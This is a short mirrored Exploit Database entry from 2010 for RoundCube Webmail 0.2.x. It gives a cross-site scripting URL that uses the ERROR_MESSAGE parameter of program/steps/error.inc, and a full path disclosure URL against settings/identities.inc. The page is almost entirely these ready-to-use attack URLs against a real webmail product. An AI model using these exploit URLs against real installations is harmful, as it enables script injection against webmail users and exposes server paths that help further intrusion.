Roundcube Webmail – Multiple Vulnerabilities

• Exploit Database
• 12 阅读

• 作者： j4ck & Globus
  日期： 2010-01-06
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/11036/

• # Exploit Title: RoundCube Webmail XSS Voulerability
  # Date: 6.01.2010
  # Author: j4ck & Globus from elitehackers.pl
  # Software Link: Software link : http://roundcube.net/download
  # Version: 0.2.X , | possible voulerability in higher versions.
  # Tested on: *
  # Code :
  
  XSS:
  
  http://[somesite.com]/[roundcube_path]/program/steps/error.inc?ERROR_CODE=601&ERROR_MESSAGE=123
  
  We can get FPD or roundcube installation path via:
  
  http://www.[somesite.com]/webmail/program/steps/settings/identities.inc